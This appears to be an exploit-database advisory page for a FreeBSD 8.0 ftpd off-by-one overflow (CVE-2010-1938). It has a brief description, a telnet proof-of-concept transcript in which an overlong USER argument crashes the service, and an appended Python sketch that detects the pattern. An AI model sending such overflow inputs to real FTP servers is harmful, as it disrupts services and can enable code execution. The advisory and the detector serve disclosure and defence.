vendor: FreeBSD 8.0
by: Maksymilian Arciemowicz and Adam Zabrocki
CVSS: 7,5 (HIGH)
CWE: 120 (Buffer Overflow)
Product Name: FreeBSD 8.0
Affected Version From: 8.0
Affected Version To: 8.0
Patch Exists: YES
Related CWE: CVE-2010-1938
CPE: o:freebsd:freebsd
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2010

FreeBSD 8.0 ftpd off-by one PoC (FreeBSD-SA-10:05)

A buffer overflow vulnerability exists in the ftpd service of FreeBSD 8.0. An attacker can send an overly long username to the ftpd service, which can cause a stack-based buffer overflow and allow the attacker to execute arbitrary code on the vulnerable system.

Mitigation:

Upgrade to the latest version of FreeBSD 8.0 or later.

Exploit-DB raw data:

# FreeBSD 8.0 ftpd off-by one PoC (FreeBSD-SA-10:05)
# CVE-2010-1938
# FreeBSD-SA-10:05
# Credit: Maksymilian Arciemowicz and Adam Zabrocki
#
# http://securityreason.com/achievement_securityalert/87
# http://security.freebsd.org/advisories/FreeBSD-SA-10:05.opie.asc
# http://blog.pi3.com.pl/?p=111
#

PoC:
Connected to localhost.
Escape character is '^]'.
220 127.cx FTP server (Version 6.00LS) ready.
user cx
331 Password required for cx.
user AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Connection closed by foreign host.

--
Best Regards,
------------------------
pub 1024D/A6986BD6 2008-08-22
uid Maksymilian Arciemowicz (cxib) <cxib@securityreason.com>
sub 4096g/0889FA9A 2008-08-22

http://securityreason.com
http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
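
Detection sketch for the session pattern in the PoC transcript above, added here as an example and not part of the original advisory or of FreeBSD's code. It flags an overlong USER argument, a USER sent when the server was waiting for a password (after 331), and a connection that closes with no reply to USER. The 32-byte threshold, the finding codes and the function name are assumptions made for this example; the page gives no buffer size.

```python
import re

# Assumption: the page gives no buffer size, so 32 bytes is a constructed threshold.
MAX_USER_LEN = 32

REPLY = re.compile(r"^(\d{3})[ -]")                 # server reply line, e.g. "331 ..."
USER = re.compile(r"^user\s+(.+)$", re.IGNORECASE)  # client USER command
PASS = re.compile(r"^pass(\s|$)", re.IGNORECASE)    # client PASS command

def scan_session(lines, max_len=MAX_USER_LEN):
    """Return (line_number, finding_code) tuples for one FTP control-channel transcript."""
    findings = []
    unanswered_user = None   # line number of a USER command with no server reply yet
    awaiting_pass = False    # True after the server answered 331
    for no, raw in enumerate(lines, 1):
        line = raw.strip()
        user = USER.match(line)
        reply = REPLY.match(line)
        if user:
            if len(user.group(1)) > max_len:
                findings.append((no, "overlong-user"))
            if awaiting_pass:
                findings.append((no, "user-after-331"))
            unanswered_user, awaiting_pass = no, False
        elif PASS.match(line):
            awaiting_pass = False
        elif reply:
            unanswered_user = None
            awaiting_pass = reply.group(1) == "331"
        elif line.lower().startswith("connection closed") and unanswered_user:
            findings.append((no, "closed-without-reply"))
    return findings

# Constructed sample in the same layout as the transcript above (40-byte argument).
SAMPLE = [
    "220 127.cx FTP server (Version 6.00LS) ready.",
    "user cx",
    "331 Password required for cx.",
    "user " + "A" * 40,
    "Connection closed by foreign host.",
]

if __name__ == "__main__":
    for no, code in scan_session(SAMPLE):
        print(f"line {no}: {code}")
```

A normal login (USER, 331, PASS, 230) produces no findings; the three codes together on one session are the signal worth alerting on.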